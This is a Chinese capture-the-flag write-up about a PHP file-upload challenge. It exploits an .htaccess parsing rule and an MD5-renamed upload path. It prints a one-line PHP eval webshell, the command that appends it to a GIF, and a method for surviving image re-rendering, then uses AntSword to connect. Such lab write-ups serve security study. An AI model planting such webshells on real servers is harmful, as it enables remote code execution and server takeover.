这里附上各种一句话木马大全
先看题:
说明了文件保存路径./upload
。点击展示发现有.htaccess
文件,还有一个flag.php
文件
在文本框中输入.htaccess
,点击预览,出现下面这句话。但输入flag.php
,会弹框说不能直接操作flag文件。看下面这句话我们可以知道:在./upload目录下,文件名为098f6bcd4621d373cade4e832627b4f6.gif
的文件可以php代码解析出来。所以可以想到要上传一个图片马,而且文件名为098f6bcd4621d373cade4e832627b4f6.gif
但看下图,若我们随便上传一个图片,文件名都会被改变。这里我上传了2.gif
文件
所以要思考怎样才能让上传后的文件名能为098f6bcd4621d373cade4e832627b4f6.gif
。于是我想到看看直接输入下面这个url会怎样
http://120.79.135.77:10002/range/upload/flag.php
结果出现了这一幕,既然它出现了就一定是有问题的(然而我一开始发现的时候却并没有在意它),然后随便点开看了一下,就知道了是用MD5加密
使文件名改变的。
然后将098f6bcd4621d373cade4e832627b4f6
解密得是test
。也就是说我们只要将文件名为test.gif
的文件上传,就能被保存为098f6bcd4621d373cade4e832627b4f6.gif
然后我们开始制作图片马。在shell.php
文件中写入下面这个一句话木马,然后在命令行输入copy 2.gif /b + shell.php /a test.gif
,2.gif
是一个普通图片,得到的test.gif
就是我们要的图片马了
<? @eval($_REQUEST[x]);?>
然后将test.gif
上传,下载后的图片用010 Editor
打开却发现php代码不见了,这时就想到是二次渲染
,那就将原图和下载的图片比较,然后在相同部分插入一句话木马。
【就是做这一步花了我好久时间,我知道是二次渲染,试了好多次插入一句话木马,但保存后的图片的马还是不见了,直到今天,在最前面的蓝色部分(相同部分)插入马,终于成功—多尝试,细节细节细节!!】
在蚁剑中连接得到flag